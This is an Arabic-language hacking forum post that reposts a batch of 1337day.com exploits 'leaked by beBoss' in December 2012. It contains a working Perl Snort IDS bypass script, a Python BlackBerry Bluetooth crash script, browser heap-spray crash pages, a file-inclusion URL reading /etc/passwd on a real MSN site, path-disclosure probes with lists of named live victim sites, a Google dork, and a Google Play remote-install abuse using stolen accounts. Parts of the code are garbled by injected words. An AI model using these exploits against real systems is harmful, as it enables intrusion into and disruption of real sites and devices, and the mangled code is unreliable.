Loading...

BTC Address to donate : [[address]]

Donation of [[value]] BTC Received. Thank You.
[[error]]


mehdi racha عضو مميز
  • شكراً: 1767
  • تم شكره 1729 مرة في 331 مشاركة

GoogleMarket bug for Android 4.1.1=>4.2 Remote Target DL PoC

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

Google Market bug for Android 4.1.1 => 4.2 Jelly Bean Remote Target Download PoC
 
You need
:
1Google Account
2
Android device 
3
PC browser
 
You can install infinity count of apps to remote device from browser on PC
.
 
The key is
1) if you entered your google account once on android device 
2
) If you manage to get hold of someone else's account (gmail), you can install any apps from Google Play Market on this device.
3) without asking owner of device for agreement.
 
In such way you can install bad soft and also can install so many apps then memory of device will be filled 
 
# 1337day.com [2012-12-12] 
MS Office Excel 2007 Seven Memory Corruption Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

you can download POC from 
 
http
://1337day.com/private_files/msexcel2007poc.rar 

mirror http://www.mediafire.com/download.php?gc9h1yowx04c1c9
 
# 1337day.com [2012-12-12] 
Snort Multiple HTTP Bypass <= 2.9.3.1 Exploit

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

#!/usr/bin/perl
use IO::Socket;
 
# By Xianur0
[email protected]
# http://loscaballeros.mx/
# Snort Multiple HTTP Bypass
 
my $bypasscount=0;
die(
"Snort Multiple HTTP Bypass By Xianur0\n\nUse: snort.pl [URL]\nExample: snort.pl http://www.google.com/phpinfo.php\n\nUse: snort.pl [Path to snort rules]\nExample: snort.pl /home/xianur0/Descargas/snortrules-snapshot-2905/rules/\n"unless($ARGV[0]);
if(-
f $ARGV[0] || -d $ARGV[0]){
print 
"[-] Analyzing Rules...\n\n";
checkrules($ARGV[0]);
} else {
tests();
}
 
sub hdump {
my $offset 0;
my(@array,$format);
foreach 
my $data (unpack("a16"x(length($_[0])/16)."a*",$_[0])) {
my($len)=length($data);
if (
$len == 16) {
@array = 
unpack('N4'$data);
$format="0x%08x (%05d)   %08x %08x %08x %08x   %s\n";
} else {
@array = 
unpack('C*'$data);
$_ sprintf "%2.2x"$_ for @array;
push(@array, '  ') while $len++ < 16;
$format="0x%08x (%05d)" .
"   %s%s%s%s %s%s%s%s %s%s%s%s %s%s%s%s   %s\n";

$data =~ tr/\0-\37\177-\377/./;
printf $format,$offset,$offset,@array,$data;
$offset += 16;
}
}
 
sub snorthexdecode{
my $encoded=$_[0];
while(
$encoded =~ /\|((\s*([\d\w]{2})\s*)+)\|/) {
$cadena="\\|".$1."\\|";
$remplazo="";
my @caracteres=($cadena =~ /([\d\w]{2})/g);
foreach 
$caracter (@caracteres) {
$remplazo.=chr(hex($caracter));
}
$encoded=~s/$cadena/$remplazo/g;
}
return 
$encoded;
}
sub analizerules {
my $pathrules=$_[0];
if(-
f $pathrules){
open RULE,$pathrules;
while(<
RULE>) {
my $rule=$_;
$rule=~s/[\r\n]+$//g;
if($rule=~/http_uri;/ && $rule=~/content:\s*"([^"]+)"/i){
if(snorthexdecode($1)=~/([^"
]*\.\w{1,4})(\|3F\||\?)([^"]+)/){
my 
$bypass=$1."?junk&".$3;
print "
[!] Vuln rule ".$pathrules."".$rule."\n[!] URI Bypass".$bypass."\n\n";
$bypasscount++;
}
} elsif(
$rule=~/http_header;/ && $rule=~/content:"([^\"]+)"/){
if(
snorthexdecode($1)=~/^([^\:\s]+\:) (.+)$/){
my $bypass=$1."\t".$2;
print 
"[!] Vuln rule ".$pathrules.": ".$rule."\n[!] Header Bypass: ".$bypass."\n\n";
$bypasscount++;
}
}
}
elsif(-d $pathrules) {
opendir (DIR$pathrules);
while(
readdir DIR) {
analizerules($pathrules."/".$_) if($_ !~/^\.+$/);
}
}
}
sub checkrules {
my $checkpath=$_[0];
analizerules($checkpath);
print 
"[-] Bypassed rules: ".$bypasscount."\n";
}
sub tests {
my $host="";
my $port=80;
my $path="";
if(
$ARGV[0]=~/^http:\/\/([^\/]+)(.*)$/){
$host=$1;
$path=$2;
if(
$host=~/^([^\:]+)\:(\d+)$/){
$host=$1;
$port=$2;
}
}
if(
$host!~/^[^\:]+$/){
die(
'Invalid URL!');
}
print 
"[-]Target:\nHost: ".$host."\nPort: ".$port."\nPath: ".$path."\n\n";
if(
$path !~ "/(.+)"){
die(
'I need a path...');
$path=$1;
}
$encodedpath=$path;
$encodedpath=~s/([^\/])/"%" uc(sprintf("%2.2x",ord($1)))/eg;
print 
"[-] Encoded path: ".$encodedpath."\n";
@
orders=("1st (CRLF)","2nd (+Pipelining)","3rd","4th","5th");
my $payload="POST / HTTP/1.1\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: 0\r\n".
"Connection: Keep-Alive\r\n".
"Host: ".$host.("\r\n"x12).
"POST / HTTP/1.1\r\n".
"Host: ".$host."\r\n".
"Connection: Keep-Alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Content-Length: 30".("\r\n"x12).
"1234567890";
 
@
packets = ("\n\n\n\nHEAD ".$path." HTTP/1.1\r\nHost: ".$host.":".$port."\r\nConnection: Close\r\n\r\n","");
$packets[1]=$payload.$packets[0];
 
$i=0;
foreach 
$packet (@packets){
my $sock = new IO::Socket::INET (
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Reuse => 1,
);
die 
"Could not create socket: $!\n" unless $sock;
print 
"[-] Seding ".$orders[$i]." test...\n";
hdump($packet);
print 
$sock $packet;
print 
"\n[+] Headers:\n";
my $todo="";
while(<
$sock>){
$todo.=$_;
}
close($sock);
hdump($todo);
$i++;
}

 
# 1337day.com [2012-12-12] 
MSN LFI Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

http://logitheque.msn.fr/recherche/recherche.php?searchstring=../../../../../../../../etc/passwd%00&plus=telecharger&chaine=forums 
 
# 1337day.com [2012-12-12] 
Blackberry OBEX PUSH Crash (Bluetooth) PoC

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

#!/usr/bin/python
 
#Blackberry Bluetooth Crash (OBEX PUSH)
# By Xianur0
[email protected]
# First you need to connect to RFCOMM device (rfcomm connect 0 <bluetooth mac address> [channel])
# By default it uses the rfcomm0 but this number can be changed in the first argument of the command: rfcomm connect 0, rfcomm connect 1, etc...
# ATTENTION: The channel of obex push can vary from blackberry to blackberry
 
import binascii
import serial
 
filetosend
="/home/xianur0/image.jpg"
nametosend="crashingyou.jpg"
 
def filenamed(string):
hexstring "00"
for x in string:
hexstring += hex(ord(x))[2:]+"00"
return hexstring
 
def bin2dec
(hexstring):
hexval ""
for a in hexstring:
aux hex(ord(a))[2:]
if 
len(aux) < 2:
aux "0"+aux
hexval 
+= aux
return int(hexval16)
 
def dec2hex(dec,largo):
retorno hex(dec)[2:]
if (
len(retorno)/2)*!= len(retorno):
retorno "0"+retorno
if(len(retorno)/largo):
for 
i in range(largo-(len(retorno)/2)):
retorno "00"+retorno
return retorno
 
def enviar
(filepath,filename):
serialrf None
print "Loading..."
try:
serialrf serial.Serial('/dev/rfcomm0',9600# Change me if rfcomm is not 0
except:
return 
1
print "Ok!"
filename filenamed(filename)
filebinary ""
filehandler open(filepath,'rb')
for 
linea in filehandler.readlines():
filebinary += linea
lengthfile 
len(filebinary)
print 
"File Size:",lengthfile
sizefragment 
38
while True:
try:
print 
"Sending bytes..."
serialrf.write(binascii.unhexlify("80000710001000")) # Inicializamos
print "Reading..."
status serialrf.read(1)
print 
hex(ord(status))
if 
hex(ord(status)) == "0xa0" or hex(ord(status)) == "0x10":
resto serialrf.read(2)
largo bin2dec(resto)-3
if largo 0:
resto serialrf.read(largo)
else:
return 
2
header 
"01"+dec2hex((len(filename)/2)+4,2) + filename "00c3" dec2hex(len(filebinary),4)
lengthheader = (len(filename)/2)+12
fragmento 
filebinary[0:sizefragment]
envio binascii.unhexlify("02" dec2hex(lengthheader+(sizefragment+3),2) + header "48" dec2hex(len(fragmento)+3,2))
envio += fragmento
serialrf
.write(envio)
except:
return 
4
serialrf
.close()
return 
0
 
 
enviar
(filetosend,nametosend
 
# 1337day.com [2012-12-12] 
Mozilla FireFox 17.0.1 Memory Corruption PoC

كود PHP:
<!--
//...Leaked bY beBoss..// 
//......12.12.2012.....//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
###
# Title : Mozilla FireFox 17.0 Memory Corruption p0c
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : local - 0day
# Type : Local Exploit - proof of concept
# Tested on : Linux SUSE - Enterprise v.11
# Download : [http://download.cdn.mozilla.net/pub/mozilla.org/firefox/releases/17.0.1/linux-i686/fr/firefox-17.0.1.tar.bz2]
###
 
# <3 <3 Greetings t0 Palestine <3 <3
# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
 
-->
 
<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javaاستبدال script:KedAns();">
<استبدال script language="Javaاستبدال Script">
function KedAns()
{
 
// (puf) it's just for make a buffer and Crash !
// some shellcode's work with this proof of concept, maybe can able to Corrupt* the MEM and Exec remote codes
var puf =unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
 
استبدال document.write(puf); // Buffer1
 
var buffer = '\x41\x42\x43' // ABC buffer
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
استبدال document.write(buffer); // Corrupt this !!!
 
}
 
// [ Memory Corruption !! (*__^) ]
 

</استبدال script>
</head>
</body>
</html>
<!--
 
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================ --> 
 
# 1337day.com [2012-12-12] 
vBulletin 4.2.0 Full Path Disclosure Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

The Full Path Disclosure is vBulletin 4.2.0in forumrunnerWith Full Path Disclosure you can get the path to the forum you're in and also (most of the times is the same) cpanel's username
 
To see it go to:
 
http://[path]/forumrunner/include/album.php
 
It works in 90of the forums.
 
 
Example:
http://www.mgcproducts.com/forumrunner/include/album.php
http://atheistdiscussion.com/forumrunner/include/album.php
http://apolyton.net/forumrunner/include/album.php
http://www.romaniancommunity.net/forumrunner/include/album.php
http://www.ghosthax.com/forumrunner/include/album.php
http://www.reddotcity.net/forumrunner/include/album.php
http://www.sevenskins.com/forum/forumrunner/include/album.php
http://www.purevb.com/forumrunner/include/album.php
http://forum.hackersbrasil.com.br/forumrunner/include/album.php 
 
# 1337day.com [2012-12-12] 
Wordpress 3.4.2 Full Path Disclosure Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

The Full Path Disclosure is in Wordpress <= 3.4.2with this information you can get the path to the site you're in and (in most of the cases) cpanel's username.
 
To see it go to:
 
http://[path]/wp-includes/rss-functions.php
 
 
Examples:
http://tsmp.us/wp-includes/rss-functions.php
http://tafeio.com/wp-includes/rss-functions.php
http://santana1540.com.br/wp-includes/rss-functions.php
 
It works in 90of the websites 
 
# 1337day.com [2012-12-12] 
vBulletin 4.x/5.x multiple Full Puth Disclosure Vuln
كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

/includes/api/commonwhitelist_2.php
/includes/api/commonwhitelist_5.php
/includes/api/commonwhitelist_6.php
/includes/api/1/album_album.php
/includes/api/1/album_editalbum.php
/includes/api/1/album_latest.php
/includes/api/1/album_overview.php
/includes/api/1/album_picture.php
/includes/api/1/album_user.php
/includes/api/1/announcement_edit.php
/includes/api/1/announcement_view.php
/includes/api/1/api_cmscategorylist.php
/includes/api/1/api_cmssectionlist.php
/includes/api/1/api_forumlist.php
/includes/api/1/api_getnewtop.php
/includes/api/1/api_getsecuritytoken.php
/includes/api/1/api_getsessionhash.php
/includes/api/1/api_init.php
/includes/api/1/api_mobilepublisher.php
/includes/api/1/api_usersearch.php
/includes/api/1/blog_blog.php
/includes/api/1/blog_bloglist.php
/includes/api/1/blog_comments.php
/includes/api/1/blog_custompage.php
/includes/api/1/blog_dosendtofriend.php
/includes/api/1/blog_list.php
/includes/api/1/blog_members.php
/includes/api/1/blog_post_comment.php
/includes/api/1/blog_post_editblog.php
/includes/api/1/blog_post_editcomment.php
/includes/api/1/blog_post_edittrackback.php
/includes/api/1/blog_post_newblog.php
/includes/api/1/blog_post_postcomment.php
/includes/api/1/blog_post_updateblog.php
/includes/api/1/blog_sendtofriend.php
/includes/api/1/blog_subاستبدال scription_entrylist.php
/includes/api/1/blog_subاستبدال scription_userlist.php
/includes/api/1/blog_usercp_addcat.php
/includes/api/1/blog_usercp_editcat.php
/includes/api/1/blog_usercp_editoptions.php
/includes/api/1/blog_usercp_editprofile.php
/includes/api/1/blog_usercp_modifycat.php
/includes/api/1/blog_usercp_updateprofile.php
/includes/api/1/editpost_editpost.php
/includes/api/1/editpost_updatepost.php
/includes/api/1/forum.php
/includes/api/1/forumdisplay.php
/includes/api/1/inlinemod_domergeposts.php
/includes/api/1/list.php
/includes/api/1/login_lostpw.php
/includes/api/1/member.php
/includes/api/1/memberlist_search.php
/includes/api/1/misc_showattachments.php
/includes/api/1/misc_whoposted.php
/includes/api/1/newreply_newreply.php
/includes/api/1/newreply_postreply.php
/includes/api/1/newthread_postthread.php
/includes/api/1/newthread_newthread.php
/includes/api/1/poll_newpoll.php
/includes/api/1/poll_polledit.php
/includes/api/1/poll_showresults.php
/includes/api/1/private_editfolders.php
/includes/api/1/private_insertpm.php
/includes/api/1/private_messagelist.php
/includes/api/1/private_newpm.php
/includes/api/1/private_showpm.php
/includes/api/1/private_trackpm.php
/includes/api/1/profile_editattachments.php
/includes/api/1/profile_editoptions.php
/includes/api/1/profile_editprofile.php
/includes/api/1/register_addmember.php
/includes/api/1/register_checkdate.php
/includes/api/1/search_process.php
/includes/api/1/search_showresults.php
/includes/api/1/showthread.php
/includes/api/1/subاستبدال scription_addsubاستبدال scription.php
/includes/api/1/subاستبدال scription_editfolders.php
/includes/api/1/subاستبدال scription_viewsubاستبدال scription.php
/includes/api/1/threadtag_managetags.php
/includes/api/2/album_picture.php
/includes/api/2/api_blogcategorylist.php
/includes/api/2/blog_blog.php
/includes/api/2/blog_bloglist.php
/includes/api/2/blog_list.php
/includes/api/2/blog_subاستبدال scription_entrylist.php
/includes/api/2/blog_subاستبدال scription_userlist.php
/includes/api/2/blog_usercp_groups.php
/includes/api/2/content.php
/includes/api/2/editpost_editpost.php
/includes/api/2/forumdisplay.php
/includes/api/2/member.php
/includes/api/2/newreply_newreply.php
/includes/api/2/forum.php
/includes/api/2/poll_newpoll.php
/includes/api/2/poll_polledit.php
/includes/api/2/poll_showresults.php
/includes/api/2/private_messagelist.php
/includes/api/2/private_trackpm.php
/includes/api/2/profile_editattachments.php
/includes/api/2/search_showresults.php
/includes/api/2/showthread.php
/includes/api/3/api_gotonewpost.php
/includes/api/4/album_user.php
/includes/api/4/api_forumlist.php
/includes/api/4/api_getnewtop.php
/includes/api/4/breadcrumbs_create.php
/includes/api/4/facebook_getforumid.php
/includes/api/4/facebook_getnewforummembers.php
/includes/api/4/get_vbfromfacebook.php
/includes/api/4/login_facebook.php
/includes/api/4/newreply_postreply.php
/includes/api/4/newthread_postthread.php
/includes/api/4/register.php
/includes/api/4/register_addmember.php
/includes/api/4/search_findusers.php
/includes/api/4/subاستبدال scription_viewsubاستبدال scription.php
/includes/api/5/api_init.php
/includes/api/6/api_getnewtop.php
/includes/api/6/api_gotonewpost.php
/includes/api/6/content.php
/includes/api/6/member.php
/includes/api/6/newthread_newthread.php
/includes/block/blogentries.php
/includes/block/cmsarticles.php
/includes/block/html.php
/includes/block/newposts.php
/includes/block/sgdiscussions.php
/includes/block/tagcloud.php
/includes/block/threads.php
/forumrunner/include/subاستبدال scriptions.php
/forumrunner/include/search_forum.php
/forumrunner/include/profile.php
/forumrunner/include/post.php
/forumrunner/include/pms.php
/forumrunner/include/online.php
/forumrunner/include/moderation.php
/forumrunner/include/misc.php
/forumrunner/include/login.php
/forumrunner/include/get_thread.php
/forumrunner/include/get_forum.php
/forumrunner/include/cms.php
/forumrunner/include/attach.php
/forumrunner/include/announcement.php
/forumrunner/include/album.php
/forumrunner/support/vbulletin_methods.php
/forumrunner/support/stringparser_bbcode.class.php
/forumrunner/support/utils.php
/forumrunner/support/other_methods.php
/packages/skimlinks/hooks/postbit_display_complete.php
/packages/skimlinks/hooks/showthread_complete.php
/packages/skimlinks/hooks/userdata_start.php 
 
# 1337day.com [2012-12-12] 
RealPlayer .html v15.0.6.14 Memory Corruption & Overflow PoC

كود PHP:
<!--
//...Leaked bY beBoss..// 
//......12.12.2012.....//
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
 
###
# Title : RealPlayer .html v15.0.6.14 Memory Corruption and Overflow POC
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com .net .org
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : local - 0day
# Type : Local Exploit - proof of concept
# Tested on : Windows7 (Fr)
###
 
# <3 <3 Greetings t0 Palestine <3 <3
# Greetings To BarbarOS-Dz in the jail x_x ! F-ck HaCking, Lov3 Explo8ting
 
Info :
Save the HTML Code as p0c.html and drop/open it with Realplayer
ABCABC........... Boom !!! ^__^
 
-->
 
<html>
<head>
<title>Memory Corruption bY KedAns-Dz</title>
<body onload="javaاستبدال script:KedAns();">
<استبدال script language="Javaاستبدال Script">
function KedAns()
{
 
// (puf) it's just for make a buffer and Crash !
var puf =unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
puf+=unescape("䅂䅂");
 
استبدال document.write(puf); // Buffer1
 
var buffer = '\x41\x42\x43' // ABC buffer
for(i=0; i <= 999 ; ++i)
{
buffer+=buffer+buffer
استبدال document.write(buffer); // Corrupt this !!!
 
}
 
// [ Memory Corruption !! (*__^) ]
 

</استبدال script>
</head>
</body>
</html>
<!--
 
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Indoushka , Caddy-Dz , Kalashinkov3 , Mennouchi.Islem
# Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz, KinG Of PiraTeS, TrOoN, T0xic, Chevr0sky, Black-ID, Barbaros-DZ,
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : KedAns ^^ * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * HD Moore * YMCMB ..all
# Exploit-ID Team : jos_ali_joe + kaMtiEz + r3m1ck (exploit-id.com) * Milw0rm * KeyStr0ke * JF * L3b-r1Z * HMD
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================ --> 
 
# 1337day.com [2012-12-12] 
IPBoard 3.x.x/3.4 Full Path Disclosure

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

Exploit:
admin/upgrade/index.php?app=upgrade&s=&section[]=index&do=login
 
Dork

intext:Community Forum Software by IP.Board
 
Fix

Turn off display_errors in php.ini 
 
# 1337day.com [2012-12-12] 
Steam Linux Closed Beta bypass authorization
كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

POC:
0x01 Download the steam client for linux herehttp://media.steampowered.com/client/installer/steam.deb
 
0x02 Login to your account using the Steam Client normally
 
0x03 
There will be a MsgBox saying that you do not have authorization, Do not click OK, and normally use as if authorization 
 
# 1337day.com [2012-12-12] 
WordPress 3.5 multiple path disclosure vulnerabilities

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

# Exploit Title: wordpress 3.5 multiple path disclosure vulnerabilities 
# Date: [12.12.12]
# Author: [Cyb3rboy]
# Vendor or Software Link: [wordpress.org]
# Version: [wordpress 3.5]
# Category:: [webapps]
# Google dork: [use brain ]
# Tested on: [windows]
 
the following directories is vulnerable to path disclosure vulnerability in word-press 3.5
 
/wp-settings.php
POC 
:- http://sqayasia.com/wp-settings.php
http://www.way2blogging.org/wp-settings.php
 
/wp-includes/admin-bar.php
POC
:- http://sqayasia.com/wp-includes/admin-bar.php
http://www.way2blogging.org/wp-includes/admin-bar.php
 
 
/wp-includes/author-template.php
Poc
:- http://sqayasia.com/wp-includes/author-template.php
http://www.way2blogging.org/wp-includes/author-template.php
 
/wp-includes/canonical.php
Poc
:- http://sqayasia.com/wp-includes/canonical.php
 
/wp-includes/category-template.php
Poc
:- http://sqayasia.com/wp-includes/category-template.php
http://www.way2blogging.org/wp-includes/category-template.php
 
/wp-includes/class-wp-embed.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-embed.php
http://www.way2blogging.org
 
/wp-includes/media.php
POc
:- http://sqayasia.com/wp-includes/media.php
 
/wp-includes/ms-default-constants.php
Poc 
:- http://sqayasia.com/wp-includes/ms-default-constants.php
http://www.way2blogging.org
 
/wp-includes/ms-default-filters.php
Poc
:- http://sqayasia.com/wp-includes/ms-default-filters.php
http://www.way2blogging.org
 
/wp-includes/ms-settings.php
Poc
:- http://sqayasia.com/wp-includes/ms-settings.php
http://www.way2blogging.org
 
/wp-includes/post.php
Poc
:- http://sqayasia.com/wp-includes/post.php
http://www.way2blogging.org
 
/wp-includes/rss.php
Poc
:- http://sqayasia.com/wp-includes/rss.php
http://www.way2blogging.org/wp-includes/rss.php
 
/wp-includes/user.php
Poc
:- http://sqayasia.com/wp-includes/user.php
http://www.way2blogging.org/wp-includes/user.php
 
/wp-includes/theme.php
Poc
:- http://sqayasia.com/wp-includes/theme.php
http://www.way2blogging.org/wp-includes/theme.php
 
/wp-includes/vars.php
Poc
:- http://sqayasia.com/wp-includes/vars.php
http://www.way2blogging.org/wp-includes/vars.php
 
/wp-includes/class-wp-http-ixr-client.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-http-ixr-client.php
 
/wp-includes/class-wp-image-editor-gd.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-image-editor-gd.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-gd.php
 
/wp-includes/class-wp-image-editor-imagick.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-image-editor-imagick.php
http://www.way2blogging.org/wp-includes/class-wp-image-editor-imagick.php
 
/wp-includes/class-wp-xmlrpc-server.php
Poc
:- http://sqayasia.com/wp-includes/class-wp-xmlrpc-server.php
http://www.way2blogging.org/wp-includes/class-wp-xmlrpc-server.php
 
/wp-includes/class.wp-استبدال scripts.php
Poc
:- http://sqayasia.com/wp-includes/class.wp-استبدال scripts.php
http://www.way2blogging.org/wp-includes/class.wp-استبدال scripts.php
 
/wp-includes/class.wp-styles.php
Poc
:- http://sqayasia.com/wp-includes/class.wp-styles.php
http://www.way2blogging.org/wp-includes/class.wp-styles.php
 
/wp-includes/comment-template.php
Poc
:- http://sqayasia.com/wp-includes/comment-template.php
http://www.way2blogging.org/wp-includes/comment-template.php
 
/wp-includes/default-filters.php
Poc
:- http://sqayasia.com/wp-includes/default-filters.php
http://www.way2blogging.org/wp-includes/default-filters.php
 
/wp-includes/default-widgets.php
Poc
:- http://sqayasia.com/wp-includes/default-widgets.php
http://www.way2blogging.org/wp-includes/default-widgets.php
 
/wp-includes/feed-atom-comments.php
Poc
:- http://sqayasia.com/wp-includes/feed-atom-comments.php
http://www.way2blogging.org/wp-includes/feed-atom-comments.php
 
/wp-includes/feed-atom.php
Poc
:- http://sqayasia.com/wp-includes/feed-atom.php
http://www.way2blogging.org/wp-includes/feed-atom.php
 
/wp-includes/feed-rdf.php
Poc
:-http://sqayasia.com/wp-includes/feed-rdf.php
http://www.way2blogging.org/wp-includes/feed-rdf.php
 
/wp-includes/feed-rss.php
Poc
:-http://sqayasia.com/wp-includes/feed-rss.php
http://www.way2blogging.org/wp-includes/feed-rss.php
 
/wp-includes/feed-rss2-comments.php
Poc
:- http://sqayasia.com/wp-includes/feed-rss2-comments.php
http://www.way2blogging.org/wp-includes/feed-rss2-comments.php
 
/wp-includes/feed-rss2.php
Poc
:- http://sqayasia.com/wp-includes/feed-rss2.php
http://www.way2blogging.org/wp-includes/feed-rss2.php
 
/wp-includes/functions.php
Poc
:- http://sqayasia.com/wp-includes/functions.php
http://www.way2blogging.org/wp-includes/functions.php 
 
# 1337day.com [2012-12-12] 
Joomla all v1.5 Error Based SQL Injection Vulnerability

كود PHP:
//...Leaked bY beBoss..// 
//......12.12.2012.....//

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   
/' \            __  /'__`\        /\ \__  /'__`\                   0
0  
/\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  
\/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
